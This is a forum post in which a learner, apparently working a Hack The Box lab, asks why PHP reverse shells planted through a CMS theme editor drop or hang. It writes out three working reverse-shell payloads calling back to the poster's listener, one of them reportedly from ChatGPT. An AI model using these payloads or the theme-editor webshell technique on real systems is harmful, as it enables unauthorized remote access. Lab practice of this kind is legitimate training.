Hi all,
I have got the root.txt of the Getting Started Knowledge check via metasploit. Now, I want to try manual solution. I can log into target’s admin page(easily try admin/admin). Firstly, I add this: <?php system(‘id’); ?> into admin/theme-edit.php, and then refresh the main page. I can see the ID info at the bottom, it does work.
However, after I use <?php system (“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.58 9443 >/tmp/f”) ?> to replace <?php system(‘id’); ?> and refresh. The webpage becomes very slow and actually stuck on loading process. And my local listening port does not receive any request.
Next, I try to use other reverse shell command, such as <?php $sock=fsockopen("10.10.15.58",9443);system("/bin/sh -i <&3 >&3 2>&3"); ?>. Yes, my local monitor port can see the request and build a connection. But just one moment, the connection will automaticlly shutdown.
Why is this? Does it because some reverse commands are blocked by firewall or something else? And Should I try other commands one by one and even in the real scenario?
By the way, I finally build the connection, ChatGPT give me some more stable command, but I still help you can tell me do I really have to try one by one in the real job content?
<?php
$ip = “10.10.15.58”;
$port = 9443;
// Command to establish reverse shell using Netcat
$cmd = “/bin/bash -c ‘exec bash -i >& /dev/tcp/{$ip}/{$port} 0>&1’”;
$output = shell_exec($cmd);
echo $output; // Output any response from the command execution
?>